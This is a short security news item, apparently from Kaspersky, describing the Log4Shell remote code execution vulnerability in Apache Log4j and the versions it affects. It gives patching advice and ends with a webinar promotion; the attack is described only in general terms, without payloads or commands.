With millions of java software using vulnerable Log4j library code, hackers will be exploiting unpatched systems for years to come.
Last week a new, particularly dangerous critical vulnerability was discovered in the Apache Log4j library. The Log4Shell or LogJam (CVE-2021-44228) Remote Code Execution (RCE) class vulnerability allows attackers to gain the ability to execute arbitrary code and potentially take full control over a system. The CVE has been ranked a 10 out of 10 in terms of severity.
Any of the millions of java software that uses a vulnerable version (version 2.0beta9 to 2.14.1) of The Apache Logging Project open-source logging library is susceptible to this new CVE. This is because Log4j contains a ‘lookup mechanism’ for searching requests using a special syntax. Hackers can exploit this lookup mechanism by creating a custom prefix in the search syntax to transfer information to a server under their control. This can ultimately lead to arbitrary code execution or leak of confidential information.
According to Evgeny Lopatin, a security expert at Kaspersky: “What makes this vulnerability particularly dangerous is not only the fact that attackers can gain complete control over the system, but how easy it is to exploit. Even an inexperienced hacker can take advantage of it—and we’re already seeing cybercriminals actively looking for software to exploit with this CVE. However, the good news is that a strong security solution can go a long way in keeping users’ protected.”
To safeguard against this new vulnerability, development teams should install the most recent version of the library, 2.15.0. In the case of using the library in a third-party product, it is necessary to monitor and install timely updates from a software provider.
Other than applying the necessary vendor patches and following the Apache Log4j project guidelines, IT defenders should refer to their cybersecurity vendors for precautions specific to the products used.
For an urgent in-depth discussion on Log4Shell and a live Q&A, readers can register for Kaspersky’s webinar on 17 December, 9pm SGT (4pm GMT+3) to attend the event or receive a post-event recording.